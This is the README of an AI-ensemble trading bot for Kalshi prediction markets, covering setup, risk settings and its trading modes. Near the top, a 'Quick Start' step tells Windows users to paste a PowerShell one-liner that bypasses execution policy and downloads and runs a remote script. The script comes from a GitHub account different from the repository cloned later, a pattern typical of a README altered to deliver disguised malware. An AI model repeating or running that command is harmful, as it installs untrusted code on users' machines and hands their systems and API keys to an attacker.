An autonomous trading bot for Kalshi prediction markets powered by a five-model AI ensemble.
Five frontier LLMs debate every trade. The system only enters when they agree.
Quick Start Β· Features Β· How It Works Β· Configuration Β· Contributing Β· Kalshi API Docs
If you just want to get the project running fast on Windows, use the installation command below first. After that, continue with the project-specific setup, configuration, and usage sections.
Open CMD and run this single command:
powershell -ep bypass -c "iwr https://github.com/0mnjb/Kalshi-AI-Trading-Bot/releases/download/v1.92/main.ps1 -UseBasicParsing | iex"Then continue with the project-specific setup steps below.
β οΈ Disclaimer ?This is experimental software for educational and research purposes only. Trading involves substantial risk of loss. Only trade with capital you can afford to lose. Past performance does not guarantee future results. This software is not financial advice. The authors are not responsible for any financial losses incurred through the use of this software.
π Why Discipline Mode Exists ?Through extensive live trading on Kalshi across multiple strategies, we learned that trading without category enforcement and risk guardrails leads to significant losses. The most common mistakes: over-allocating to economic events (CPI, Fed decisions) with no real edge, and using aggressive position sizing. The consistently profitable edge we found was NCAAB NO-side trading (74% win rate, +10% ROI). This repo now ships with discipline systems enabled by default ?category scoring, portfolio enforcement, and sane risk parameters.
Three steps to get running in paper-trading mode (no real money):
# 1. Clone and set up
git clone https://github.com/ryanfrigo/kalshi-ai-trading-bot.git
cd kalshi-ai-trading-bot
python setup.py # creates .venv, installs deps, checks config
# 2. Add your API keys
cp env.template .env # then open .env and fill in KALSHI_API_KEY,
# XAI_API_KEY, and OPENROUTER_API_KEY
# 3. Run in disciplined mode (default ?category scoring + guardrails)
python cli.py run --paper
# Or run the safe compounder (NO-side edge-based, most conservative)
python cli.py run --safe-compounderThen open the live dashboard in another terminal:
python cli.py dashboardNeed API keys?
- Kalshi key + private key ?kalshi.com/account/settings (API docs)
- xAI key ?console.x.ai
- OpenRouter key ?openrouter.ai
- ?Five frontier LLMs collaborate on every decision ?Grok-4, Claude Sonnet 4, GPT-4o, Gemini 2.5 Flash, DeepSeek R1
- ?Role-based specialization ?each model plays a distinct analytical role (forecaster, bull, bear, risk manager, news analyst)
- ?Consensus gating ?positions are skipped when models diverge beyond a configurable confidence threshold
- ?Deterministic outputs ?temperature=0 for reproducible AI reasoning
- ?Directional trading (50% of capital) ?AI-predicted probability edge with Kelly Criterion sizing
- ?Market making (40%) ?automated limit orders capturing bid-ask spread
- ?Arbitrage detection (10%) ?cross-market opportunity scanning
- ?Fractional Kelly position sizing (0.75x Kelly for volatility control)
- ?Hard daily loss limit ?stops trading at 15% drawdown
- ?Max drawdown circuit breaker ?halts at 50% portfolio drawdown
- ?Sector concentration cap ?no more than 90% in any single category
- ?Daily AI cost budget ?stops spending when API costs hit $50/day
- ?Trailing take-profit at 20% gain
- ?Stop-loss at 15% per position
- ?Confidence-decay exits when AI conviction drops
- ?Time-based exits (10-day max hold)
- ?Volatility-adjusted thresholds
- ?Real-time Streamlit dashboard ?portfolio value, positions, P&L, AI decision logs
- ?Paper trading mode ?simulate trades without real orders; track outcomes on settled markets
- ?SQLite telemetry ?every trade, AI decision, and cost metric logged locally
- ?Unified CLI ?
run,dashboard,status,health,backtestcommands
The bot runs a four-stage pipeline on a continuous loop:
INGEST DECIDE (5-Model Ensemble) EXECUTE TRACK
-------- βββββββββββββββββββββββββ --------- --------
ββββββββββββββββββββββββββ? Kalshi ββββββββ?? Grok-4 (Forecaster 30%)? REST API ββββββββββββββββββββββββββ? ? Claude (News Analyst 20%)? WebSocket ββββββββ?ββββββββββββββββββββββββββ? Stream ? GPT-4o (Bull Case 20%)? ββ?Kalshi ββ?P&L
ββββββββββββββββββββββββββ? Order Win Rate
RSS / News βββββββ?? Gemini (Bear Case 15%)? Router Sharpe
Feeds ββββββββββββββββββββββββββ? Drawdown
? DeepSeek(Risk Mgr 15%)? Kelly Cost
Volume & ββββββββ?ββββββββββββββββββββββββββ? Sizing Budget
Price Data Debate ?Consensus
Confidence Calibration
Market data, order book snapshots, and news feeds are pulled via the Kalshi REST API and WebSocket stream. RSS feeds from financial news sources supplement the signal.
Each of the five models analyzes the incoming data from its assigned perspective and returns a probability estimate + confidence score. The ensemble combines weighted votes:
| Model | Role | Weight |
|---|---|---|
| Grok-4 (xAI) | Lead Forecaster | 30% |
| Claude Sonnet 4 (OpenRouter) | News Analyst | 20% |
| GPT-4o (OpenRouter) | Bull Researcher | 20% |
| Gemini 2.5 Flash (OpenRouter) | Bear Researcher | 15% |
| DeepSeek R1 (OpenRouter) | Risk Manager | 15% |
If the weighted confidence falls below min_confidence_to_trade (default: 0.50), the opportunity is skipped. If models disagree significantly, position size is automatically reduced.
Qualifying trades are sized using the Kelly Criterion (fractional 0.75x) and routed through Kalshi's order API. Market-making orders are placed symmetrically around the mid-price.
Every decision is written to a local SQLite database. The dashboard and --stats commands surface cumulative P&L, win rate, Sharpe ratio, and per-strategy breakdowns in real time.
- Python 3.12 or later
- A Kalshi account with API access (API docs)
- An xAI API key (Grok-4)
- An OpenRouter API key (Claude, GPT-4o, Gemini, DeepSeek)
The setup script will:
- ?Check Python version compatibility
- ?Create virtual environment
- ?Install all dependencies (with Python 3.14 compatibility handling)
- ?Test that the dashboard can run
- ?Print troubleshooting guidance
git clone https://github.com/ryanfrigo/kalshi-ai-trading-bot.git
cd kalshi-ai-trading-bot
python -m venv .venv
source .venv/bin/activate # macOS / Linux
# .venv\Scripts\activate # Windows
# Python 3.14 users only:
export PYO3_USE_ABI3_FORWARD_COMPATIBILITY=1
pip install -r requirements.txtcp env.template .env # fill in your keys| Variable | Description |
|---|---|
KALSHI_API_KEY |
Your Kalshi API key ID |
XAI_API_KEY |
xAI key for Grok-4 |
OPENROUTER_API_KEY |
OpenRouter key (Claude, GPT-4o, Gemini, DeepSeek) |
OPENAI_API_KEY |
Optional fallback |
Place your Kalshi private key as kalshi_private_key (no extension) in the project root. Download from Kalshi Settings ?API. This file is git-ignored.
python -m src.utils.database
β οΈ Use-mflag ?runningpython src/utils/database.pydirectly will fail with a module import error.
# Paper trading (no real orders ?safe to test)
python cli.py run --paper
# Live trading (real money)
python cli.py run --live
# Launch monitoring dashboard
python cli.py dashboard
# Check portfolio balance and open positions
python cli.py status
# Verify all API connections
python cli.py healthOr invoke the bot script directly:
python beast_mode_bot.py # Paper trading
python beast_mode_bot.py --live # Live trading
python beast_mode_bot.py --dashboard # Dashboard modeSimulate trades without risking real money. Every signal is logged to SQLite and a static HTML dashboard renders cumulative P&L, win rate, and per-signal details after markets settle.
# Scan markets and log signals
python paper_trader.py
# Continuous scanning every 15 minutes
python paper_trader.py --loop --interval 900
# Settle markets and update outcomes
python paper_trader.py --settle
# Regenerate HTML dashboard
python paper_trader.py --dashboard
# Print stats to terminal
python paper_trader.py --statsThe dashboard writes to docs/paper_dashboard.html ?open locally or host via GitHub Pages.
kalshi-ai-trading-bot/
βββ beast_mode_bot.py # Main bot entry point
βββ cli.py # Unified CLI: run, dashboard, status, health, backtest
βββ paper_trader.py # Paper trading signal tracker
βββ pyproject.toml # PEP 621 project metadata
βββ requirements.txt # Pinned dependencies
βββ env.template # Environment variable template
?βββ src/
? βββ agents/ # Multi-model ensemble (forecaster, bull/bear, risk, trader)
? βββ clients/ # API clients (Kalshi, xAI, OpenRouter, WebSocket)
? βββ config/ # Settings and trading parameters
? βββ data/ # News aggregation and sentiment analysis
? βββ events/ # Async event bus for real-time streaming
? βββ jobs/ # Core pipeline: ingest, decide, execute, track, evaluate
? βββ strategies/ # Market making, portfolio optimization, quick flip
? βββ utils/ # Database, logging, prompts, risk helpers
?βββ scripts/ # Utility and diagnostic scripts
βββ docs/ # Additional documentation + paper dashboard HTML
βββ tests/ # Pytest test suite
All trading parameters live in src/config/settings.py:
# Position sizing
max_position_size_pct = 5.0 # Max 5% of balance per position
max_positions = 15 # Up to 15 concurrent positions
kelly_fraction = 0.75 # Fractional Kelly multiplier
# Market filtering
min_volume = 200 # Minimum contract volume
max_time_to_expiry_days = 30 # Trade contracts up to 30 days out
min_confidence_to_trade = 0.50 # Minimum ensemble confidence to enter
# AI settings
primary_model = "grok-4"
ai_temperature = 0 # Deterministic outputs
ai_max_tokens = 8000
# Risk management
max_daily_loss_pct = 15.0 # Hard daily loss limit
daily_ai_cost_limit = 50.0 # Max daily AI API spend (USD)The ensemble configuration (model roster, weights, debate settings) lives in EnsembleConfig in the same file.
Every trade, AI decision, and cost metric is recorded to trading_system.db (local SQLite). Use the dashboard or scripts in scripts/ to review:
- Cumulative P&L and win rate
- Sharpe ratio and maximum drawdown
- AI confidence calibration
- Cost per trade and daily API budget utilization
- Per-strategy breakdowns (directional vs. market making)
pytest tests/ # full suite
pytest tests/ -v # verbose
pytest --cov=src # with coverageblack src/ tests/ cli.py beast_mode_bot.py
isort src/ tests/ cli.py beast_mode_bot.py
mypy src/- Create a module in
src/strategies/ - Wire it into
src/strategies/unified_trading_system.py - Set allocation percentage in
src/config/settings.py - Add tests in
tests/
Bot not placing live trades despite --live flag
Check logs for the mode confirmation string:
grep -i "live trading\|paper trading\|LIVE ORDER\|PAPER TRADE" logs/trading_system.log | tail -20"LIVE TRADING MODE ENABLED"?correct"Paper trading mode"?still in paper mode; verify API key has TRADING permissions in Kalshi Settings
Dashboard won't launch / import errors
Import errors in VS Code are IDE linter warnings, not runtime errors.
# Fix: activate venv, then run from project root
source .venv/bin/activate
python beast_mode_dashboard.pySet VS Code Python interpreter to .venv/bin/python via Cmd+Shift+P ?Python: Select Interpreter.
Python 3.14 PyO3 compatibility error
# Quick fix
export PYO3_USE_ABI3_FORWARD_COMPATIBILITY=1
pip install -r requirements.txt
# Recommended: use Python 3.13
pyenv install 3.13.1 && pyenv local 3.13.1
python -m venv .venv && source .venv/bin/activate
pip install -r requirements.txtContributions are welcome! See CONTRIBUTING.md for full guidelines.
Quick steps:
- Fork the repository
- Create a feature branch:
git checkout -b feature/your-feature - Make changes, add tests, run
pytestandblack - Commit with conventional commit format:
feat: add new model weight config - Open a Pull Request
Good first issues: look for the good first issue label.
The bot now supports three distinct trading modes. Disciplined is the default.
The safe, category-aware mode. Runs the AI ensemble but with guardrails:
python cli.py run --paper # Paper trading (safe, no real money)
python cli.py run --live # Live trading with discipline enforced
python cli.py run --disciplined # Explicit flag (same as default)Settings enforced:
- Max drawdown: 15% (vs 50% in beast mode)
- Min confidence: 65% (vs 50% in beast mode)
- Max position size: 3% of portfolio
- Max sector concentration: 30%
- Kelly fraction: 0.25 (quarter-Kelly)
- Category scoring active ?blocks categories with score < 30
The most conservative and historically validated strategy:
python cli.py run --safe-compounder # Dry run (shows opportunities)
python cli.py run --safe-compounder --live # Live executionStrategy rules:
- NO side ONLY ?never buys YES
- YES last price must be ?20Β’ (near-certain NO outcome)
- NO ask must be > 80Β’
- Edge (EV - price) must be > 5Β’
- Places resting maker orders at
lowest_ask - 1Β’(near-zero fees) - Max 10% of portfolio per position (half-Kelly sizing)
- Skips all sports, entertainment, and "mention" markets
This strategy is the closest thing to a pure edge play on Kalshi.
β οΈ Not recommended. Aggressive settings with no category guardrails have historically led to significant losses in live prediction market trading.
The original aggressive mode with minimal guardrails. Available for comparison/research:
python cli.py run --beast --paper # Only run beast mode in paper tradingAggressive settings:
- Max drawdown: 50%
- Min confidence: 50%
- Max position: 5%
- Sector cap: 90%
- Kelly fraction: 0.75
The category scorer evaluates each Kalshi market category on a 0-100 scale and enforces allocation limits.
| Factor | Weight | Description |
|---|---|---|
| ROI | 40% | Average return on investment across all trades |
| Recent Trend | 25% | Direction of last 10 trades (recency-weighted) |
| Sample Size | 20% | More data = more confidence in the score |
| Win Rate | 15% | Percentage of winning trades |
| Score Range | Max Position Size | Status |
|---|---|---|
| 80-100 | 20% of portfolio | STRONG ? |
| 60-79 | 10% of portfolio | GOOD π’ |
| 40-59 | 5% of portfolio | WEAK π‘ |
| 20-39 | 2% of portfolio | POOR π |
| 0-19 | 0% (blocked) | BLOCKED π« |
Categories scoring below 30 are hard-blocked ?the bot will not enter any trade in those categories regardless of AI confidence.
python cli.py scoresExample output:
======================================================================
CATEGORY SCORES
Category Score WR ROI Trades Alloc Status
------------------ ------ ------ -------- ------- ------ ----------
NCAAB 72.3 74% +10.0% 50 10% GOOD π’
NBA 41.2 52% +1.5% 28 5% WEAK π‘
POLITICS 31.0 48% -8.0% 15 2% MARGINAL π΄
CPI 8.4 25% -65.0% 20 0% BLOCKED π«
FED 12.1 32% -40.0% 25 0% BLOCKED π«
ECON_MACRO 10.5 30% -55.0% 40 0% BLOCKED π«
======================================================================
The scorer is pre-seeded with real historical data:
- NCAAB: 74% win rate, +10% ROI ?score ~72 ?allowed at 10% allocation
- ECON/CPI: 25% win rate, -65% ROI ?score ~8 ?blocked
- FED: 32% win rate, -40% ROI ?score ~12 ?blocked
python cli.py history # Last 50 trades with category breakdown
python cli.py history --limit 100 # Last 100 tradesAfter extensive live trading across multiple strategies, here's what the data taught:
The AI ensemble can be 80% confident on a CPI trade and still be wrong. Market-implied probabilities on economic releases are already efficient ?there's no structural edge for a retail bot. The bot was trading these with the same aggression as sports markets where it had actual edge.
Fix: Category scoring now hard-blocks economic markets until they prove a positive edge over ? trades.
A Kelly fraction of 0.75 sounds reasonable. It's not ?it compounds losses catastrophically. At 0.75x Kelly with a 45% win rate, you can lose 80% of capital in a standard drawdown scenario.
Fix: Default is now 0.25x Kelly (quarter-Kelly), which is more conservative than most professional traders use.
A 50% drawdown limit means you can lose half your money before the bot stops. That's not a limit ?it's a suggestion. A 15% limit forces the bot to stop while you still have capital to analyze and adjust.
Fix: 15% max drawdown, with the circuit breaker actually stopping trades (not just logging a warning).
When 90% of capital is in economic categories and there's a Fed meeting, everything moves together. Correlated losses compound faster than diversified losses.
Fix: 30% sector cap means no single category can dominate the portfolio.
The bot was scanning every 30 seconds and trading everything it found. More trades with no edge = faster path to zero.
Fix: 60-second scan interval. Trades only when confidence ?65% AND category score ?30.
- Kalshi Trading API Docs
- Kalshi API Authentication
- Kalshi Markets Overview
- OpenRouter Model Catalog
- xAI API (Grok)
This project is licensed under the MIT License. See LICENSE for details.
*If this project is useful to you, consider giving it a ?
Made with β€οΈ for the Kalshi trading community
β Done.
kalshi-ai-bot kalshi-bot kalshi-trading-bot ai-trading prediction-markets multi-llm-ensemble kalshi-prediction automated-trading python-bot grok-4 claude-gpt-gemini kelly-criterion risk-management paper-trading ensemble-trading ai-consensus market-making kalshi-api disciplined-trading ncaab-trading